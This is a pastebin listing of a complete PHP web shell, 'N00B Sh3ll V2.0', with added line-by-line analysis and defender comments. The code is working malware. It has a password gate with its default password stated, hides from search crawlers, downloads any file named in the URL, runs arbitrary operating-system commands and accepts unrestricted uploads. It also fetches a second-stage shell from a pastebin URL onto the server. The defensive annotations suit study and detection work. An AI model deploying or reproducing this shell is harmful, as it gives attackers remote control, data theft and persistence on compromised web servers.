Jancuokjaran

Backdor

Jun 6th, 2018
  1. <?php
  2. /*-----------------------------------------------*/
  3. #################################
  4. ### ###
  5. ### N00B Sh3ll V2.0 © 2018 ###
  6. ### Code by XZ-Sec ###
  7. ### ###
  8. #################################
  9. /*-----------------------------------------------*/
  // [analysis] Request bootstrap of this PHP web shell: starts a session, then tries to
  // switch off error display, error logging and the execution time limit.
  // Defender note: error_log/log_errors are overridden below, so PHP's own error log is
  // unlikely to record this script; web-server access logs and file-integrity
  // monitoring are the more dependable evidence sources.
  10. session_start();
  11. error_reporting(0);
  12. set_time_limit(0);
  13. @set_magic_quotes_runtime(0);
  14. @clearstatcache();
  15. @ini_set('error_log',NULL);
  16. @ini_set('log_errors',0);
  17. @ini_set('max_execution_time',0);
  18. @ini_set('output_buffering',0);
  19. @ini_set('display_errors', 0);
  20.  
  // Access-control value: compared (loose ==) with md5($_POST['pass']) in the session
  // gate that follows login_shell(). It is an unsalted MD5 hex digest; the literal is a
  // fixed string that file-content scanners can match on.
  21. $auth_pass = "dcb76da384ae3028d6aa9b2ebcea01c9"; // default: rahasiacok
  // $color and the three $default_* settings are not read anywhere else in this
  // listing; presumably left over from another shell this one was derived from.
  22. $color = "#00ff00";
  23. $default_action = 'FilesMan';
  24. $default_use_ajax = true;
  25. $default_charset = 'UTF-8';
  // Crawler cloak: a request whose User-Agent contains any listed name (case-insensitive)
  // receives a bare 404 and the script exits, so search-engine bots see "not found".
  // Defender note: judge a suspect file by its content on disk, not by the HTTP status
  // a crawler-style fetch returns.
  26. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  27. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  28. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  29. header('HTTP/1.0 404 Not Found');
  30. exit;}}
  // [analysis] login_shell(): prints the password prompt and ends the request.
  // Output is static HTML: inline CSS, an image hot-linked from image.ibb.co, an
  // ASCII-art banner and a POST form with one password field named "pass" (no action
  // attribute, so it posts back to this same URL). Takes no parameters and returns
  // nothing; the trailing exit means the caller never regains control.
  // Defender note: the "pass" field name shows up in POST bodies, and the hot-linked
  // image is fetched by whoever opens the page, which can surface in proxy logs.
  31. function login_shell() {
  32. ?>
  33. <html>
  34. <head>
  35. <title>Welcome :)</title>
  36. <style type="text/css">
  37. html {
  38. margin: 20px auto;
  39. background:#000000;
  40. color: green;
  41. text-align: center;
  42. }
  43. pre {
  44. color: cyan;
  45. }
  46. header {
  47. color: green;
  48. margin: 10px auto;
  49. }
  50. input[type=password] {
  51. width: 200px;
  52. height: 25px;
  53. color: cyan;
  54. background: #000000;
  55. border: 1px;
  56. padding: 5px;
  57. margin-left: 20px;
  58. text-align: center;
  59. }
  60.  
  61. .kedip {
  62. -webkit-animation-name: blinker;
  63. -webkit-animation-duration: 3s;
  64. -webkit-animation-timing-function: linear;
  65. -webkit-animation-iteration-count: infinite;
  66.  
  67. -moz-animation-name: blinker;
  68. -moz-animation-duration: 2s;
  69. -moz-animation-timing-function: linear;
  70. -moz-animation-iteration-count: infinite;
  71.  
  72. animation-name: blinker;
  73. animation-duration: 1s;
  74. animation-timing-function: linear;
  75. animation-iteration-count: infinite;
  76.  
  77. color: lime;
  78. }
  79.  
  80. @-moz-keyframes blinker {
  81. 0% { opacity: 1.0; }
  82. 50% { opacity: 0.0; }
  83. 100% { opacity: 1.0; }
  84. }
  85.  
  86. @-webkit-keyframes blinker {
  87. 0% { opacity: 1.0; }
  88. 50% { opacity: 0.0; }
  89. 100% { opacity: 1.0; }
  90. }
  91.  
  92. @keyframes blinker {
  93. 0% { opacity: 1.0; }
  94. 50% { opacity: 0.0; }
  95. 100% { opacity: 1.0; }
  96. }
  97. </style>
  98. </head>
  99. <center>
  100. <header>
  101. <img src='https://image.ibb.co/dYMh8T/Ruu_Ytj_E1_SACjg_Yf_VMJSYhg.png' width='350' height='350'>
  102. <br>
  103. <pre onkeydown="return false;" onmousedown="return false;" class="kedip">
  104.  
  105.  
  106.  
  107. __ ___
  108. / / ____ ____ _____/ (_)___ ____ _
  109. / / / __ \/ __ `/ __ / / __ \/ __ `/
  110. / /___/ /_/ / /_/ / /_/ / / / / / /_/ / _ _ _
  111. /_____/\____/\__,_/\__,_/_/_/ /_/\__, (_|_|_|_)
  112. /____/
  113.  
  114.  
  115. </pre>
  116. <form method="post">
  117. <input type="password" name="pass">
  118. </form>
  119. <?php
  120. exit; // stops here: an unauthenticated request never reaches the code after the call site
  121. }
  // [analysis] Session gate. The session flag is keyed by md5() of the Host header.
  // When the flag is absent it is set if $auth_pass is empty or if md5($_POST['pass'])
  // loosely equals $auth_pass; otherwise login_shell() prints the prompt and exits.
  // Defender note: a POST carrying only a "pass" field, followed by requests with
  // query strings from the same client, is the access-log pattern this gate produces.
  122. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  123. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  124. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  125. else
  126. login_shell();
  // [analysis] File exfiltration handler: with ?act=download&file=<path> the script sends
  // the named file as an attachment. The path comes straight from the query string with
  // no validation, so anything readable by the PHP process can be returned.
  // Defender note: "act=download" together with "file=" in the query string of a request
  // to this script is a direct access-log indicator of data being pulled off the host.
  127. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  128. @ob_clean();
  129. $file = $_GET['file'];
  130. header('Content-Description: File Transfer');
  131. header('Content-Type: application/octet-stream');
  132. header('Content-Disposition: attachment; filename="'.basename($file).'"'); // only the base name is exposed in the header
  133. header('Expires: 0');
  134. header('Cache-Control: must-revalidate');
  135. header('Pragma: public');
  136. header('Content-Length: ' . filesize($file));
  137. readfile($file); // streams the file body to the client
  138. exit;
  139. }
  140. ?>
  141. <?php
  142. #############################
  143. # #
  144. # Coded By XZ-Sec. #
  145. # N00B Sh3ll V 2.0 #
  146. # #
  147. #############################
  // [analysis] Second PHP section: repeats the error-reporting and time-limit settings
  // already applied at the top of the file.
  148. error_reporting(0);
  149. set_time_limit(0);
  // [analysis] exe($xz): runs the string $xz as an operating-system command and returns
  // whatever the command printed, as a string.
  // It uses the first of system(), exec(), passthru(), shell_exec() for which
  // function_exists() is true; if none is available the function falls off the end and
  // returns null. All calls are prefixed with @ so PHP warnings are suppressed.
  // Hardening note: function_exists() reports false for functions listed in php.ini
  // disable_functions, so with all four disabled this helper yields no output.
  // Defender note: each call means the web-server/PHP process spawns a child process,
  // which process-creation telemetry on the host can flag.
  150. function exe($xz) {
  151. if(function_exists('system')) {
  152. @ob_start(); // system() prints directly, so output is captured via a buffer
  153. @system($xz);
  154. $buff = @ob_get_contents();
  155. @ob_end_clean();
  156. return $buff;
  157. } elseif(function_exists('exec')) {
  158. @exec($xz,$results);
  159. $buff = "";
  160. foreach($results as $result) {
  161. $buff .= $result; // output lines are joined with no separator between them
  162. } return $buff;
  163. } elseif(function_exists('passthru')) {
  164. @ob_start(); // same buffer capture as the system() branch
  165. @passthru($xz);
  166. $buff = @ob_get_contents();
  167. @ob_end_clean();
  168. return $buff;
  169. } elseif(function_exists('shell_exec')) {
  170. $buff = @shell_exec($xz);
  171. return $buff;
  172. }
  173. }
  // [analysis] Main panel for an authenticated session: status flags, page header,
  // directory breadcrumb, upload form and command form, then the upload handler.
  // Defender note: exe('dir') runs on every request that reaches this point, so even a
  // plain page view makes the web-server process spawn a command.
  174. $x = (exe('dir')) ? "ON" : "OFF"; // "ON" when command execution produced any output
  175. $c = (function_exists('curl_version')) ? "ON" : "OFF"; // whether the curl extension is loaded
  // The header below prints php_uname() (OS and kernel details of the host) and loads a
  // favicon from upload.wikimedia.org.
  176. echo '<title>N00B Sh3ll</title>
  177. <link rel="icon" type="image/png" href="https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/Okupa.svg/270px-Okupa.svg.png">
  178. <style>
  179. a {color: black; text-decoration: none;}
  180. input[type=text],[type=submit] { background: transparent; color: black; border: 1px transparent; }
  181. </style><b><i>'.php_uname().'<hr><a href="?">[ Home ] | </a><a href="?xz"> [ Big Shell ] | </a>Path : ';
  // Undo magic-quotes escaping on POST values when that legacy setting is on.
  182. if(get_magic_quotes_gpc()){
  183. foreach($_POST as $key=>$value){
  184. $_POST[$key] = stripslashes($value);
  185. }
  186. }
  // Working directory: taken from the "d" query parameter without validation, else the
  // script's current directory. Defender note: "d=<path>" in the query string is the
  // access-log trace of directory browsing through this script.
  187. if(isset($_GET['d'])){
  188. $path = $_GET['d'];
  189. }else{
  190. $path = getcwd();
  191. }
  192. $path = str_replace('\\','/',$path); // normalise Windows separators
  193. $paths = explode('/',$path);
  194.  
  // Breadcrumb: one link per path component, each pointing at ?d=<prefix up to that
  // component>. Components are echoed into the HTML without escaping.
  195. foreach($paths as $id=>$pat){
  196. if($pat == '' && $id == 0){
  197. $a = true;
  198. echo '<a href="?d=/">/</a>';
  199. continue;
  200. }
  201. if($pat == '') continue;
  202. echo '<a href="?d=';
  203. for($i=0;$i<=$id;$i++){
  204. echo "$paths[$i]";
  205. if($i != $id) echo "/";
  206. }
  207. echo '">'.$pat.'</a>/';
  208. }
  209. chdir ($path); // later relative file operations resolve against this directory
  // Two forms: a file upload (field "xz") and a command box (text field "nct",
  // submit button "cok"). $x and $c show the ON/OFF flags computed above.
  210. echo '<hr><form enctype="multipart/form-data" method="POST">
  211. <input type="file" name="xz" />
  212. <input type="submit" value="Upload" />
  213. </form>
  214. <form enctype="multipart/form-data" method="post">
  215. Command : '.$x.' | Curl : '.$c.'<br>
  216. -N00B Sh3ll- $<input type="text" name="nct">
  217. <input type="submit" name="cok" value="~">
  218. </form><br>';
  // Upload handler: copies the uploaded temp file into $path under the client-supplied
  // file name, with no check on name or type. Prints "Berhasil" (Indonesian: success)
  // or "Gagal" (failed).
  // Defender note: a multipart POST with a file part named "xz", followed by a new file
  // in a web-accessible directory, is the trace to look for.
  219. if(isset($_FILES['xz'])){
  220. if(copy($_FILES['xz']['tmp_name'],$path.'/'.$_FILES['xz']['name'])){
  221. echo "<br>Berhasil";
  222. }else{
  223. echo '<br>Gagal';
  224. }
  225. }
  // [analysis] Second-stage fetch, triggered when an "xz" request parameter is present
  // (the "[ Big Shell ]" link uses ?xz). If privcok.php is not already in the current
  // working directory, the script downloads https://pastebin.com/raw/gDB35W6u and saves
  // it under that name, then prints a link to it. "Gagal Ambil Shell" is Indonesian for
  // "failed to fetch shell".
  // Defender note: indicators here are a file named privcok.php appearing next to this
  // script or in the browsed directory, and an outbound HTTPS request from the web
  // server itself to pastebin.com.
  226. if(isset($_REQUEST['xz'])) {
  227. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path); // path relative to the web root, used to build the link
  // xz($url, $isi): downloads $url with curl into the local file $isi and returns the
  // result of curl_exec(). The target is opened in "w" mode before the transfer, so it
  // is created or truncated even when the download fails. TLS peer verification is
  // switched off, so the remote certificate is not checked.
  228. function xz($url, $isi) {
  229. $fp = fopen($isi, "w");
  230. $ch = curl_init();
  231. curl_setopt($ch, CURLOPT_URL, $url);
  232. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  233. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  234. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  235. curl_setopt($ch, CURLOPT_FILE, $fp);
  236. return curl_exec($ch);
  237. curl_close($ch);
  238. fclose($fp);
  239. ob_flush();
  240. flush();
  241. }
  242. if(file_exists('privcok.php')) {
  243. echo "<a href='$full/privcok.php' target='_blank'>-> Done !!! <-</a>";
  244. } else {
  245. if(xz("https://pastebin.com/raw/gDB35W6u","privcok.php")) {
  246. echo "<a href='$full/privcok.php' target='_blank'>-> Done !!! <-</a>";
  247. } else {
  248. echo "Gagal Ambil Shell";
  249. }
  250. }
  251. }
  // [analysis] Command handler: unless the POST contains the "cok" submit field the
  // script ends here. Otherwise the "nct" field is passed unchanged to exe() and the
  // command's output is echoed inside <pre> without HTML escaping.
  // Defender note: POST bodies to this script containing both "nct" and "cok" fields
  // mark interactive command execution; request-body logging or a WAF rule on those
  // field names can surface it.
  252. if(!isset($_POST['cok'])) die;
  253. $xz = $_POST['nct'];
  254. $crst = "<pre>".exe("".$xz)."</pre>";
  255. echo $crst;
  256. ?>